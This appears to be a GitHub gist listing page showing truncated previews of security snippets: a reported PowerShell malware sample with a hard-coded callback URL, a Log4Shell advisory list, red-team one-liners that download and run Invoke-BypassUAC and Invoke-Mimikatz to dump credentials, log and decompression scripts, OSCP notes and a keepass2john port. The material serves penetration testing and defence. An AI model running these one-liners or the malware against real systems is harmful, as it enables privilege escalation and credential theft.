🏠
Working from home

Kevin kevXZY

  • Paris
@infernoboy
infernoboy / danger.ps1
Created April 8, 2022 23:39
This script was found in a malicious file not being detected by any AV as reported by virustotal
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "http://api.private-chatting.com/connect";
$__Version__ = "M_37";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active June 28, 2024 12:07
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
Internet health:
ISC: http://www.isc.org
NetCraft: http://news.netcraft.com/
US-CERT: http://www.US-Cert.gov
General technology and security trends:
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@linuxmalaysia
linuxmalaysia / logstash-windows-events.txt
Last active March 15, 2024 13:51
logstash windows events from winlogbeat. Translate common Event ID's and Translate common Event ID's to Quadrants
input {
beats {
id => "01-beats-input"
port => 55044
tags => "winlogbeat"
}
}
@vortexau
vortexau / decompress.ps1
Last active May 13, 2024 07:53
Powershell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
@mubix
mubix / infosec_newbie.md
Last active July 4, 2024 21:11
How to start in Infosec

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@HarmJ0y
HarmJ0y / keepass2john.py
Created June 30, 2016 06:02
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
#!/usr/bin/python
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#